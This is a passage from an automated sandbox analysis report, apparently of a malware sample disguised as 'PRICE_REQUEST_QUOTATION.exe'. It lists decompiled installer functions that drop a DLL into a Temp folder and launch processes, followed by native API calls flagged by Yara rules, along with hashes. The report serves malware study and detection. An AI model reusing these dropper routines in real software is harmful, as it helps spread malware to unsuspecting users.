							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}

0x00404e0f
0x00404e34
0x00404e54
0x00404e57
0x00404e5a
0x00404e71
0x00404e77
0x00404e7e
0x00404e85
0x00404e8c
0x00404e91
0x00404e97
0x00000000
0x00404ea7
0x00404e41
0x00404e94
0x00404e94
0x00000000
0x00404e94
0x00404e4d
0x00404e4f
0x00000000
0x00404e4f
0x00404e15
0x00000000
0x00000000
0x00404e1c
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404E39
CallWindowProcA.USER32 ref: 00404EA7

Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1

Strings

, xrefs: 00404E11

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE

Uniqueness

Uniqueness Score: -1.00%

Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024f1
0x004024f1
0x004024f4
0x0040250f
0x004024f6
0x004024f8
0x004024fd
0x00402504
0x00402516
0x0040268f
0x0040268f
0x0040251c
0x0040252e
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x004028c1
0x004028cd

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll,00000000,?,?,00000000,00000011), ref: 0040252E

Strings

C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll, xrefs: 004024FD, 00402522

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll
API String ID: 427699356-2535635339
Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405430
0x0040544c
0x00405454
0x00405459
0x00000000
0x0040545f
0x00405463

APIs

CreateProcessA.KERNEL32 ref: 0040544C
CloseHandle.KERNEL32(?), ref: 00405459

Strings

Error launching installer, xrefs: 0040543A

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}

0x00403586
0x0040358e
0x00403595
0x00403598
0x00403598
0x0040359a
0x0040359f
0x004035a6
0x004035ac
0x004035b0
0x004035b1
0x004035b9

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
GlobalFree.KERNEL32 ref: 004035A6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403597

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405702
0x0040570c
0x0040570e
0x00405715
0x0040571d
0x00000000
0x00000000
0x00000000
0x0040571d
0x0040571f
0x00405724

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 00405707
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 00405715

Strings

C:\Users\user\Desktop, xrefs: 00405701

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x0040581f
0x00405821
0x00405849
0x0040582e
0x00405833
0x0040583e
0x00000000
0x0040585b
0x00405847
0x00405847
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PRICE_REQUEST_QUOTATION.exe PID: 4684 Parent PID: 3952 PRICE_REQUEST_QUOTATION.exeCOMMON

Executed Functions

Function 0041867A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5

Strings

A:A, xrefs: 0041869C, 004186A8

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: e4391c3208eefa8acb6ab95c494d009940cd7956795b2a0df01ba448159d5c77
Instruction ID: ab5817959eaaeb00b3b68b78b98493cdb6a9f42c9ecb8cf46a161500422af9f5
Opcode Fuzzy Hash: e4391c3208eefa8acb6ab95c494d009940cd7956795b2a0df01ba448159d5c77
Instruction Fuzzy Hash: E1F0EC71200209ABCB08DF89DC94DDB77ADAF8C754F158649FA0D97251DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5

Strings

A:A, xrefs: 0041869C, 004186A8

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004185CB, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 873533f8731280fd70d58967dd9584c488ce87b4c2b7140c58c93bd96238a518
Instruction ID: f13fa726c066822f58a3e61737c2b1b42c892671ff4e798296aad1ba3165767d
Opcode Fuzzy Hash: 873533f8731280fd70d58967dd9584c488ce87b4c2b7140c58c93bd96238a518
Instruction Fuzzy Hash: 3101AFB2201108ABCB58CF99DC95EEB77A9AF8C354F158248FA0DD7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d3e0b2438a147bd9e25dfd96366cb08a8fc01704297245828094df7f10d1c80c
Instruction ID: 290efba4303a253068a3e06cfde146bf2becb0bcfc7eb6aafb9ea7287a74ccc8
Opcode Fuzzy Hash: d3e0b2438a147bd9e25dfd96366cb08a8fc01704297245828094df7f10d1c80c
Instruction Fuzzy Hash: 24F030B51101496BCB14DF98DC84CA777A9FF8C264B158A4DFD4897202C234D855CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004186FB, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 970ffaebdd0900170551bb72a539d9bf047e582836a880ab19da45464d6a4157
Instruction ID: 91f7fb2e6f1f8d8a2516701943f21fb745bab37a8feea930ebc1e9e8948abf7e
Opcode Fuzzy Hash: 970ffaebdd0900170551bb72a539d9bf047e582836a880ab19da45464d6a4157
Instruction Fuzzy Hash: F7D02BA940D2C04FD711FB7468C50C27F80DE5211871859CED8E407503C5649615D391

Uniqueness

Uniqueness Score: -1.00%

Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041872A, Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3f38efd70032b30d505f00149dc41530f180062db7a116f8897dbaffbbde2f7a
Instruction ID: 36509fb2245b39fe827852af0e70488ca9032034e1bba789ba6be93774e29623
Opcode Fuzzy Hash: 3f38efd70032b30d505f00149dc41530f180062db7a116f8897dbaffbbde2f7a
Instruction Fuzzy Hash: E8A0023F24A429245A6162F97C85CD9971DD5CABBA324406FF52CD08A18C4F069116A6

Uniqueness

Uniqueness Score: -1.00%

Function 00A197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A197AA

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3cce71d37b1f97991231618c163ce53a505fc8cc015f1068494e3f87796eb928
Instruction ID: bcddd03d8375897d5033e4fc4f0d8046428baa4719d4ed0b95ed2911efe63032
Opcode Fuzzy Hash: 3cce71d37b1f97991231618c163ce53a505fc8cc015f1068494e3f87796eb928
Instruction Fuzzy Hash: C490026130101003D240716D64186064005E7E1351F61D031E4404554DD9558856A262

Uniqueness

Uniqueness Score: -1.00%

Function 00A199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A199AA

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0d6019db4b8f468451572f9e5db9fef30dc4175b6a60b70b1bd9d733167de71
Instruction ID: 340daf323f2ef470b5f8158ee5572bac99f074ecdedbddf26b2a9fe1251c8943
Opcode Fuzzy Hash: b0d6019db4b8f468451572f9e5db9fef30dc4175b6a60b70b1bd9d733167de71
Instruction Fuzzy Hash: 7A9002A134101442D200616D5414B060005D7E1351F61C035E5054554E8659CC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 00A19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A1978A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba7bf292a4ff7bd6b7285b6ae4068f73a973eb7c6b0e1b56d106e45b6f6b080c
Instruction ID: 4fda15a625a2ca8955e75b64a1db3e30a16c43dd447eecdd4f110dc1cd2a4e25
Opcode Fuzzy Hash: ba7bf292a4ff7bd6b7285b6ae4068f73a973eb7c6b0e1b56d106e45b6f6b080c
Instruction Fuzzy Hash: D990026921301002D280716D640860A000597D1352FA1D435E4005558DC9558869A361

Uniqueness

Uniqueness Score: -1.00%

Function 00A196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A196EA

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 730422630b6b8320dcbb787d23fc0e5581367deb4bf881963839b7a25ed0ad00
Instruction ID: ecba53ba40ae97d53c2412be5feb3f8f1fb0a13ae1da49d4cd01e1f8da930391
Opcode Fuzzy Hash: 730422630b6b8320dcbb787d23fc0e5581367deb4bf881963839b7a25ed0ad00
Instruction Fuzzy Hash: 0190027120109802D210616D940474A000597D0351F65C431E8414658E86D58891B161

Uniqueness

Uniqueness Score: -1.00%

Function 00A19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A19FEA

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe1d65a4401368daf8dff4f47fe08e2f84f4aa259fa42cc25c78b351e0c89345
Instruction ID: e50d6eb72080f22b98e51188efe54ddf29a8b40c3b237a9358dba59ded4107a2
Opcode Fuzzy Hash: fe1d65a4401368daf8dff4f47fe08e2f84f4aa259fa42cc25c78b351e0c89345
Instruction Fuzzy Hash: 1F90027131115402D210616D9404706000597D1351F61C431E4814558E86D58891B162

Uniqueness

Uniqueness Score: -1.00%

Function 00A198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A198FA

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef1a5ad38699d06f61cd6867277f96b4614f666c369b4dcfbbf512e8a4703a24
Instruction ID: 6fdbb51f071b74a6610215288686bb756626caa5da3280d64220b9c4e697100c
Opcode Fuzzy Hash: ef1a5ad38699d06f61cd6867277f96b4614f666c369b4dcfbbf512e8a4703a24
Instruction Fuzzy Hash: DE90026160101502D201716D5404616000A97D0391FA1C032E5014555FCA658992F171

Uniqueness

Uniqueness Score: -1.00%

Function 00A195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A195DA

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 091f799513e5c054425157a69518aa28ac54103b760fa87bc690c5c05f4cd7ba
Instruction ID: 8ade254712891229ecc023b2757882554a789d466c5c6c3a1cb1a1e82727f052
Opcode Fuzzy Hash: 091f799513e5c054425157a69518aa28ac54103b760fa87bc690c5c05f4cd7ba
Instruction Fuzzy Hash: 049002A1202010034205716D5414616400A97E0351B61C031E5004590EC5658891B165

Uniqueness

Uniqueness Score: -1.00%

Function 00A19A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A19A2A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a11c55db55b0562724ba075ab68179b2058fd3e956fd9a6888f125cc45b82d2a
Instruction ID: ca5a3d7921262ffba169481c93794b537532a6fb90a7973ce44081c8e9601496
